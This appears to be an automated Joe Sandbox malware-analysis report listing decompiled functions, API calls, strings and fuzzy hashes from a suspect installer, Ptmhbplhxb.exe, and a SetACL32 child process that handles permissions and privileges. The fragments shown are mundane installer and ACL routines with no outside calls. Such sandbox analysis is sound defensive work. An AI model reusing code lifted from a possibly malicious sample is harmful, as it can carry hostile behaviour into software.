                Function 00402CE4 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00402CE4(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x421428; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x42f410;
						if(_t2 >  *0x42f410) {
							_t3 = CreateDialogParamA( *0x42f400, 0x6f, 0, E00402C61, 0);
							 *0x421428 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00406339(0);
					}
				} else {
					_t6 =  *0x421428; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x421428 = 0;
					return _t6;
				}
			}






                0x00402ceb
                0x00402d05
                0x00402d0b
                0x00402d15
                0x00402d1b
                0x00402d21
                0x00402d32
                0x00402d3b
                0x00000000
                0x00402d40
                0x00402d47
                0x00402d0d
                0x00402d14
                0x00402d14
                0x00402ced
                0x00402ced
                0x00402cf4
                0x00402cf7
                0x00402cf7
                0x00402cfd
                0x00402d04
                0x00402d04

                APIs
                • DestroyWindow.USER32(00000000,00000000,00402EC4,00000001), ref: 00402CF7
                • GetTickCount.KERNEL32 ref: 00402D15
                • CreateDialogParamA.USER32(0000006F,00000000,00402C61,00000000), ref: 00402D32
                • ShowWindow.USER32(00000000,00000005), ref: 00402D40
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: Window$CountCreateDestroyDialogParamShowTick
                • String ID:
                • API String ID: 2102729457-0
                • Opcode ID: 2469aab9b0bab78131693435c259bb338fdfc1179cff7f610c16a2f3c60769c5
                • Instruction ID: 5343e4f3fd542578671bd54a8d6f819db7b5394acccd132b40ed42660498aa91
                • Opcode Fuzzy Hash: 2469aab9b0bab78131693435c259bb338fdfc1179cff7f610c16a2f3c60769c5
                • Instruction Fuzzy Hash: 01F05430601521EBC7207F24FE8CA8F7A64BB08B11791047AF445B21F4DBB448C28B9C
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405000 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                Download Yara Rule
                C-Code - Quality: 89%
                			E00405000(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x42a85c != _t16) {
							_push(_t16);
							_push(6);
							 *0x42a85c = _t16;
							E004049D7();
						}
						L11:
						return CallWindowProcA( *0x42a864, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404957(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404072(0x413);
				return 0;
			}





                0x00405004
                0x0040500e
                0x0040502a
                0x0040504c
                0x0040504f
                0x00405055
                0x0040505f
                0x00405060
                0x00405062
                0x00405068
                0x00405068
                0x00405072
                0x00000000
                0x00405080
                0x00405037
                0x0040506f
                0x0040506f
                0x00000000
                0x0040506f
                0x00405043
                0x00405045
                0x00000000
                0x00405045
                0x00405014
                0x00000000
                0x00000000
                0x0040501b
                0x00000000

                APIs
                • IsWindowVisible.USER32 ref: 0040502F
                • CallWindowProcA.USER32 ref: 00405080
                  • Part of subcall function 00404072: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00404084
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: Window$CallMessageProcSendVisible
                • String ID:
                • API String ID: 3748168415-3916222277
                • Opcode ID: 0b5703a8dab1bd1bd7dd9e2c337de487c6e053b4983eba3ecfb903a9c205ce24
                • Instruction ID: 2f0027df7ddfe28b71d6e39f600ecebaf2ba5c74aec8f2e947ae9809186c917a
                • Opcode Fuzzy Hash: 0b5703a8dab1bd1bd7dd9e2c337de487c6e053b4983eba3ecfb903a9c205ce24
                • Instruction Fuzzy Hash: 48017171500609ABDF205F51DD80E6F3B65EB84754F14403BFA01751D2C77A8CA29F9A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405604 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00405604(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x42c078->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x42c078,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                0x0040560d
                0x0040562d
                0x00405635
                0x0040563a
                0x00000000
                0x00405640
                0x00405644

                APIs
                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C078,Error launching installer), ref: 0040562D
                • CloseHandle.KERNEL32(?), ref: 0040563A
                Strings
                • Error launching installer, xrefs: 00405617
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: CloseCreateHandleProcess
                • String ID: Error launching installer
                • API String ID: 3712363035-66219284
                • Opcode ID: a2b9ecb8406674d5a7d1aded78611502900df459338db245270d40db8d5eaf79
                • Instruction ID: a14d50d96640d218925096829ca07d1800dc2b789f456133151d87fd2ad2a836
                • Opcode Fuzzy Hash: a2b9ecb8406674d5a7d1aded78611502900df459338db245270d40db8d5eaf79
                • Instruction Fuzzy Hash: 9EE046F0640209BFEB109FA0ED49F7F7AACEB00704F404921BD00F2290E67499088A7C
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00403720 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00403720() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x429834; // 0x0
				_t3 = E00403705(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x429834 =  *0x429834 & 0x00000000;
				return _t3;
			}







                0x00403721
                0x00403729
                0x00403730
                0x00403733
                0x00403733
                0x00403735
                0x0040373a
                0x00403741
                0x00403747
                0x0040374b
                0x0040374c
                0x00403754

                APIs
                • FreeLibrary.KERNEL32(?,772EFA90,00000000,C:\Users\user~1\AppData\Local\Temp\,004036F8,00403512,?,?,00000006,00000008,0000000A), ref: 0040373A
                • GlobalFree.KERNEL32 ref: 00403741
                Strings
                • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403720
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: Free$GlobalLibrary
                • String ID: C:\Users\user~1\AppData\Local\Temp\
                • API String ID: 1100898210-2382934351
                • Opcode ID: 6450b972aff65fe59d26657d82cdbaa5e3cda0ee416f3077b3e42c8154ca0fa8
                • Instruction ID: 7d8ce370987dd57b7bf148727d206b09ac62311aee63c146eb442539f55f5a8e
                • Opcode Fuzzy Hash: 6450b972aff65fe59d26657d82cdbaa5e3cda0ee416f3077b3e42c8154ca0fa8
                • Instruction Fuzzy Hash: 39E0C27391212097C7313F54EE0871ABBA86F46B22F0A403AE8407B26487745C428BCC
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405944 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00405944(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                0x00405945
                0x0040594f
                0x00405951
                0x00405958
                0x00405960
                0x00000000
                0x00000000
                0x00000000
                0x00405960
                0x00405962
                0x00405967

                APIs
                • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402DB4,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Ptmhbplhxb.exe,C:\Users\user\Desktop\Ptmhbplhxb.exe,80000000,00000003), ref: 0040594A
                • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402DB4,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Ptmhbplhxb.exe,C:\Users\user\Desktop\Ptmhbplhxb.exe,80000000,00000003), ref: 00405958
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: CharPrevlstrlen
                • String ID: C:\Users\user\Desktop
                • API String ID: 2709904686-3976562730
                • Opcode ID: a2cb5c10c54eab45be364f275a3e0fd7f40b7dc80b72c69925d8ec85e0f8a492
                • Instruction ID: 9e2646df26482555437471894173605ef17f2c9d125cfcd2b42401f98a5df656
                • Opcode Fuzzy Hash: a2cb5c10c54eab45be364f275a3e0fd7f40b7dc80b72c69925d8ec85e0f8a492
                • Instruction Fuzzy Hash: D6D0C9A240DDB1AEE70363249C04B9F6A88DF17710F0944A6E180B61A5C77C4D828BAD
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405A63 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00405A63(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                0x00405a73
                0x00405a75
                0x00405a78
                0x00405aa4
                0x00405a7d
                0x00405a86
                0x00405a8b
                0x00405a96
                0x00405a99
                0x00405ab5
                0x00405a9b
                0x00405aa2
                0x00000000
                0x00405aa2
                0x00405aae
                0x00405ab2
                0x00405ab2
                0x00405aac
                0x00000000

                APIs
                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CBE,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A73
                • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405CBE,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A8B
                • CharNextA.USER32(00000000,?,00000000,00405CBE,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A9C
                • lstrlenA.KERNEL32(00000000,?,00000000,00405CBE,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AA5
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: lstrlen$CharNextlstrcmpi
                • String ID:
                • API String ID: 190613189-0
                • Opcode ID: 63752835767028d7570d3bd2c367202728d3e51619cdcd0ff30af86384407b43
                • Instruction ID: de8867e187cffd76a1833f018909c3af52f45fcf8c0597c8515af2ce59788131
                • Opcode Fuzzy Hash: 63752835767028d7570d3bd2c367202728d3e51619cdcd0ff30af86384407b43
                • Instruction Fuzzy Hash: F5F0C231201818AFCB02DBA4CD80D9EBBA8EF46350B2540B9E840F7211D774DE019FA9
                Uniqueness

                Uniqueness Score: -1.00%

                Executed Functions

                Function 00F74BF0 Relevance: 77.3, APIs: 24, Strings: 19, Instructions: 2033fileCOMMON
                Download Yara Rule
                APIs
                • std::locale::_Init.LIBCPMT ref: 00F74D1C
                • FindFirstFileW.KERNEL32(?,?,?,00000000,00000002,?,00000002,\*.*,00000004), ref: 00F75463
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00F75488
                • std::locale::_Init.LIBCPMT ref: 00F75AA6
                • std::locale::_Init.LIBCPMT ref: 00F75DB8
                • std::locale::_Init.LIBCPMT ref: 00F74EDF
                  • Part of subcall function 00F698F0: EnterCriticalSection.KERNEL32(00FCB6D4,746D712B,?), ref: 00F69982
                  • Part of subcall function 00F698F0: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00F699CB
                  • Part of subcall function 00F698F0: GetCurrentThreadId.KERNEL32 ref: 00F699EE
                  • Part of subcall function 00F698F0: GetUserNameExW.SECUR32(00000002,00000000,00000000), ref: 00F69A2A
                  • Part of subcall function 00F698F0: GetLastError.KERNEL32 ref: 00F69A34
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Initstd::locale::_$ErrorFileLastTime$CriticalCurrentEnterFindFirstNameSectionSystemThreadUser
                • String ID: @M)w$RecurseDires$RegKeyFixPathAndOpen$Unintentionally the following registry key was created: <$You just accessed permissions on a file system root, not on the root of the drive. These very special permissions do not persist a$You just accessed permissions on a file system root, not on the root of the drive. These very special permissions do not persist a$\*.*$classes_root$current_user$hkcr$hkcu$hkey_classes_root$hkey_current_user$hkey_local_machine$hkey_users$hklm$hku$machine$users
                • API String ID: 3540323880-953956231
                • Opcode ID: 4484678930e3fef50912867c3dea876af09d7d77a885f7714673fd8a284fa202
                • Instruction ID: 174c05517183138dd5e2986b5f26a68b8c6178cc7f685202f597472deaac5e10
                • Opcode Fuzzy Hash: 4484678930e3fef50912867c3dea876af09d7d77a885f7714673fd8a284fa202
                • Instruction Fuzzy Hash: A003D070E006188FEF24DF64CC89BDDB7B1AF44314F14819AE809AB291DB75AE85DF52
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F698F0 Relevance: 35.4, APIs: 9, Strings: 11, Instructions: 379timethreadCOMMON
                Download Yara Rule
                APIs
                • EnterCriticalSection.KERNEL32(00FCB6D4,746D712B,?), ref: 00F69982
                • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00F699CB
                • GetCurrentThreadId.KERNEL32 ref: 00F699EE
                • GetUserNameExW.SECUR32(00000002,00000000,00000000), ref: 00F69A2A
                • GetLastError.KERNEL32 ref: 00F69A34
                • GetUserNameExW.SECUR32(00000002,00000000,00000000), ref: 00F69A9B
                • GetLastError.KERNEL32 ref: 00F69AA5
                • LeaveCriticalSection.KERNEL32(00FCB6D4), ref: 00F69BCC
                • LeaveCriticalSection.KERNEL32(00FCB6D4), ref: 00F69D45
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: CriticalSection$ErrorLastLeaveNameTimeUser$CurrentEnterFileSystemThread
                • String ID: %d,$%s$+qmt$@M)w$CRTCL,$DEBUG,$ERROR,$INFO ,$NONE ,$UNKNW,$WARN ,
                • API String ID: 4039181498-3974024656
                • Opcode ID: cdcfea05ce20cd2522bd232802c44032c67bebf74b8ed27af99d741ed2d6beab
                • Instruction ID: 0989db5c7a230df5bbb64ac17e11f1128b1491c22a4ec4eed236f97eab6a4666
                • Opcode Fuzzy Hash: cdcfea05ce20cd2522bd232802c44032c67bebf74b8ed27af99d741ed2d6beab
                • Instruction Fuzzy Hash: 1EE19870E04208CFDB14CFA8C885B9EBBB9FF49304F24452DE845EB291D7B5AA45EB51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F621B0 Relevance: 28.3, APIs: 11, Strings: 5, Instructions: 333COMMON
                Download Yara Rule
                APIs
                • GetCurrentProcess.KERNEL32(00000028,?,746D712B), ref: 00F62208
                • OpenProcessToken.ADVAPI32(00000000), ref: 00F6220F
                • GetLastError.KERNEL32 ref: 00F62219
                • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 00F6223C
                • GetLastError.KERNEL32(?,?,?), ref: 00F62246
                • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00F62254
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorLastProcess$CloseCurrentHandleLookupOpenPrivilegeTokenValue
                • String ID: failed with: $ the privilege $@M)w$Enabling$SetPrivilege
                • API String ID: 4232854991-2774483167
                • Opcode ID: d374d22c75d7a2f2bfb62863485ebf9addf3fd490ca099c074f5263ded82f411
                • Instruction ID: 51517752ff7d005b5a5d3c3ba4ba9bcddb115550c630cc210a8179ddce7f18e5
                • Opcode Fuzzy Hash: d374d22c75d7a2f2bfb62863485ebf9addf3fd490ca099c074f5263ded82f411
                • Instruction Fuzzy Hash: 58C10471E00208DFEB14DF64CD89B9DB776FF85304F108258E405AB295DB79AA84EF61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F76F69 Relevance: 28.2, APIs: 5, Strings: 10, Instructions: 1957COMMON
                Download Yara Rule
                APIs
                • std::locale::_Init.LIBCPMT ref: 00F76FFB
                  • Part of subcall function 00F89DCB: __EH_prolog3.LIBCMT ref: 00F89DD2
                  • Part of subcall function 00F89DCB: std::_Lockit::_Lockit.LIBCPMT ref: 00F89DDD
                  • Part of subcall function 00F89DCB: std::locale::_Setgloballocale.LIBCPMT ref: 00F89DF8
                  • Part of subcall function 00F89DCB: std::_Lockit::~_Lockit.LIBCPMT ref: 00F89E4E
                  • Part of subcall function 00F698F0: EnterCriticalSection.KERNEL32(00FCB6D4,746D712B,?), ref: 00F69982
                  • Part of subcall function 00F698F0: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00F699CB
                  • Part of subcall function 00F698F0: GetCurrentThreadId.KERNEL32 ref: 00F699EE
                  • Part of subcall function 00F698F0: GetUserNameExW.SECUR32(00000002,00000000,00000000), ref: 00F69A2A
                  • Part of subcall function 00F698F0: GetLastError.KERNEL32 ref: 00F69A34
                • LocalFree.KERNEL32(?), ref: 00F77C57
                • SetEntriesInAclW.ADVAPI32(?,?,?,?), ref: 00F78538
                • SetEntriesInAclW.ADVAPI32(?,?,?,?), ref: 00F7873E
                  • Part of subcall function 00F87820: IsValidSid.ADVAPI32(00000000,00000000,00000000,00F89605,?,00F897F0,00F89605,00000000,000000FF), ref: 00F8783E
                  • Part of subcall function 00F87820: IsValidSid.ADVAPI32(000C46C7,?,00F897F0,00F89605,00000000,000000FF), ref: 00F8784B
                  • Part of subcall function 00F87820: GetLengthSid.ADVAPI32(000C46C7,?,00F897F0,00F89605,00000000,000000FF), ref: 00F87852
                  • Part of subcall function 00F87820: CopySid.ADVAPI32(00F897F0,00000000,000C46C7,00F897F0,00F89605,00000000,000000FF), ref: 00F87871
                • LocalFree.KERNEL32(?,?,?,?,?,?), ref: 00F77C69
                  • Part of subcall function 00F688E0: GetLastError.KERNEL32(746D712B,00000000,00000000), ref: 00F68960
                  • Part of subcall function 00F698F0: GetUserNameExW.SECUR32(00000002,00000000,00000000), ref: 00F69A9B
                  • Part of subcall function 00F698F0: GetLastError.KERNEL32 ref: 00F69AA5
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorLast$EntriesFreeLocalLockitNameTimeUserValidstd::_std::locale::_$CopyCriticalCurrentEnterFileH_prolog3InitLengthLockit::_Lockit::~_SectionSetgloballocaleSystemThread
                • String ID: ($> because a filter keyword matched.$> failed with: $Omitting ACL of: <$Processing ACL of: <$Reading the SD from <$SetEntriesInAcl for DACL of <$SetEntriesInAcl for SACL of <$Write2SD$Writing SD to <
                • API String ID: 2526728192-3089814054
                • Opcode ID: 8f20486d97061b847d0a6986ac862324687b7b78dbe2f58ef13ff4eb7f93b4ab
                • Instruction ID: 4950ecb0a785162653b42f289d62c7196d7fb729e846b055ff769704d89fd10e
                • Opcode Fuzzy Hash: 8f20486d97061b847d0a6986ac862324687b7b78dbe2f58ef13ff4eb7f93b4ab
                • Instruction Fuzzy Hash: 33031771E102488BEF25DF28CC89BDDB7B2AF85304F148199E40DAB291DB74AE85DF51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F688E0 Relevance: 26.6, APIs: 12, Strings: 3, Instructions: 315librarymemorywindowCOMMON
                Download Yara Rule
                APIs
                • GetLastError.KERNEL32(746D712B,00000000,00000000), ref: 00F68960
                • #13.ACTIVEDS(?,?,00000103,?,00000103,746D712B,00000000,00000000), ref: 00F68AFB
                • SysStringByteLen.OLEAUT32(?), ref: 00F68B67
                • SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 00F68B75
                • SysFreeString.OLEAUT32(-00000001), ref: 00F68BE8
                • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,746D712B,00000000,00000000), ref: 00F68C31
                • LoadLibraryExW.KERNEL32(pdh.dll,00000000,00000002,746D712B,00000000,00000000), ref: 00F68C6F
                • FormatMessageW.KERNELBASE(00001300,00000000,00000000,00000400,?,00000000,00000000,746D712B,00000000,00000000), ref: 00F68C9E
                • LocalFree.KERNEL32(00000000,00000000,-00000002), ref: 00F68CD7
                • FreeLibrary.KERNEL32(00000000), ref: 00F68CF4
                • _com_issue_error.COMSUPP ref: 00F68D66
                • _com_issue_error.COMSUPP ref: 00F68D70
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: FreeLibraryString$ByteLoad_com_issue_error$AllocErrorFormatLastLocalMessage
